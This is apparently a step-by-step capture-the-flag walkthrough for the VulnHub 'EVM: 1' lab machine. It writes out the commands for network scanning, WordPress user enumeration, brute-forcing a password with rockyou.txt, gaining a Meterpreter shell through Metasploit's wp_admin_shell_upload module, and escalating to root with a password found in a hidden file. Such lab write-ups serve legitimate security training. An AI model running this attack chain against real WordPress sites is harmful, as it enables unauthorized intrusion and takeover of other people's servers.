Machien Link : https://www.vulnhub.com/entry/evm-1,391/ step1 : arp-scan -l --- to get the ip of the machine step2 : nmap -T4 -sSV -p- 192.168.0.188 -Pn -A FINDING 22/tcp open ssh step3 : dirb http://192.168.0.188 --- found out wordpress in running on http://192.168.0.188/wordpress step4 : wpscan --url http://192.168.0.188/wordpress -e at -e ap -e u FINDING user: c0rrupt3d_brain step5 : wpscan --url http://192.168.0.188/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt --- to get the password for the user FINDING password: 24992499 step6: service postgresql start && msfconsole and search for exploit(unix/webapp/wp_admin_shell_upload) step7 : fill the crendentials PASSWORD 24992499 yes The WordPress password to authenticate with RHOSTS 192.168.0.188 yes The target host(s), see https://docs.metasploit.com/docs/using- TARGETURI /wordpress yes The base path to the wordpress application USERNAME c0rrupt3d_brain yes The WordPress username to authenticate with step8 : meterpreter shell --- then step9 : python -c import pty; pty.spawn("/bin/bash") --- to get the proper shell step10: cd /home --- la -la --- cd /root3r -- ls -la step11: cat .root_password_ssh.txt --- password : willy26 step12: su root --- with the password : willy26 step13: whoami --- you will be root --- the cd /root --- ls -la --- cat proof.txt